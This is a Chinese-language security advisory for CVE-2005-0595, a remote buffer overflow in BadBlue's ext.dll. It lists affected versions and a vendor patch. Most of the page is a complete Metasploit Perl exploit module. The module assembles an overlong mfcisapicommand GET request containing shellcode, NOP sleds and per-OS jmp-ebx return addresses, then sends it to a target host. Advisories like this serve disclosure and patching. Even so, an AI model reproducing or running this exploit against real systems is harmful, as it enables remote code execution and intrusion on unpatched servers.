发布日期：2003-04-21
更新日期：2006-04-03

受影响系统：

Working Resources Inc. BadBlue Personal Edition 2.15
Working Resources Inc. BadBlue Personal Edition 1.7.4
Working Resources Inc. BadBlue Personal Edition 1.7.3
Working Resources Inc. BadBlue Personal Edition 1.7.2
Working Resources Inc. BadBlue Personal Edition 1.7
Working Resources Inc. BadBlue Personal Edition 1.6 Beta
Working Resources Inc. BadBlue Personal Edition 1.5.6 Beta
Working Resources Inc. BadBlue Enterprise Edition 2.15
Working Resources Inc. BadBlue Enterprise Edition 1.7.4
Working Resources Inc. BadBlue Enterprise Edition 1.7.3
Working Resources Inc. BadBlue Enterprise Edition 1.7.2
Working Resources Inc. BadBlue Enterprise Edition 1.7.1
Working Resources Inc. BadBlue Enterprise Edition 1.7
Working Resources Inc. BadBlue Enterprise Edition 1.6 Beta
Working Resources Inc. BadBlue Enterprise Edition 1.5.6 Beta
Working Resources Inc. BadBlue Enterprise Edition 1.5

描述：

---

BUGTRAQ  ID: 12673
CVE(CAN) ID: CVE-2005-0595

BadBlue是一款集合Web/P2P服务程序，支持CGI、ISAPI。自带的ISAPI模块提供HTML嵌入动态WEB页面语言。

BadBlue处理特定类型的超长畸形请求时存在漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意指令。

BadBlue的ext.dll模块在处理带超长mfcisapicommand参数的请求时存在溢出问题，攻击者可以通过提交超长的请求来触发此漏洞。

<*来源：Matthew Murphy （mattmurphy@kc.rr.com）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::badblue_ext_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info =
  {
    'Name'  => 'BadBlue 2.5 EXT.dll Buffer Overflow',
    'Version'  => '$Revision: 1.1 $',
    'Authors' => [ 'acaro <acaro [at] jervus.it>', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 0,

    'UserOpts'  =>
      {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 80],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
      },

    'Payload' =>
      {
        'Space'     => 410,
        'MinNops'   => 10,
        'BadChars'  => "\x00\x0a\x0d\x20\x26\x2b\x26\x3d\x25\x8c\x3c",
        'Keys'      => ['+ws2ord'],
      },

    'Description'  => Pex::Text::Freeform(qq{
        This is a stack overflow exploit for BadBlue version 2.5.
    Tested only the Italian language version of Windows 2000 SP0 and SP4.
    Based on the exploit by Hat-Squad.
}),

    'Refs'  =>
      [
        ['OSVDB', 14238],
        ['BID',    7387],
        ['MIL',      11],
      ],

    'DefaultTarget' => 0,
    'Targets' =>
      [
        ['Bad Blue 2.5 (Universal)', 75, 0x10027728],# jmp ebx in ext.dll
        ['Windows 2000 SP0-SP3 English', 75, 0x6c4292ab],# jmp ebx in mfc42.dll
        ['Windows 2000 SP4 English', 75, 0x6c4302d3],# jmp ebx in mfc42.dll
        ['Windows XP SP0-SP1 English', 75, 0x7762c383],# jmp ebx in shell32.dll
        ['Windows XP SP2 English', 75, 0x73e7dcfd],# jmp ebx in mfc42.dll
        ['Windows 2003 Server SP0-SP1 English', 75, 0x77d7eaf0],# jmp ebx in user32.dll
      ],

    'Keys' => ['badblue'],

    'DisclosureDate' => 'Apr 20 2003',
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the nop module.");
        return;
    }

    my $pattern = "GET /ext.dll?mfcisapicommand=";

    $pattern .= $shellcode;
    $pattern .= Pex::Text::AlphaNumText($target->[1]);
    $pattern .= "\xEB\x0C\x90\x90";
    $pattern .= pack('V', $target->[2]);
    $pattern .= $self->MakeNops(8);
    $pattern .= "\xE9\x0B\xFE\xFF\xFF";
    $pattern .= $self->MakeNops(8);
    
    my $request = $pattern . "\x0D\x0A\x0D\x0A";

    $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp ebx at 0x%.8x...", $target->[2]));

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $s->Send($request);
    $s->Recv(-1, 10);
    $s->Close();
    return;
}

1;

建议：

---

厂商补丁：

Working Resources Inc.
----------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.badblue.com/index.htm

浏览次数：2808
严重程度：0（网友投票）